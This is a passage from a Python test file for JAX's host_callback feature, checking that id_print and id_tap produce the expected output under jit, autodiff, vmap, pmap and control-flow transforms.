x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00 b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00 9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00 [] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, jax.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
jax.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
jax.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = jax.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {local_devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = jax.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
jax.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = jax.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [np.random.choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = jax.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
jax.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += jax.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = jax.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00 0.20 )
transforms: ['jvp'] what: y * 3
( 30.00 0.60 )""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
arg = jnp.float32(5.)
jaxpr = str(jax.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
print(jaxpr)
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=()
] b
_:* = mul c 2.00
d:f32[] = mul 1.00 2.00
_:* = broadcast_in_dim[broadcast_dimensions=() shape=()] 0.00
e:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',))
] d
f:f32[] = mul e 3.00
in (f,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = jax.grad(jax.grad(func))
# making the Jaxpr does not print anything
_ = jax.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = jax.grad(func)
print(jax.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00 0.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00 False )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = jax.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = jax.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00 [4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return jax.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
jax.jit(jax.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = jax.jit(jax.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms(self):
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.] [0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3. 9. ) ( 0.1 0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0. [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = jax.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3 9 )
device: cpu:1 what: x,x^2
( 4 16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = jax.pmap(
jax.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
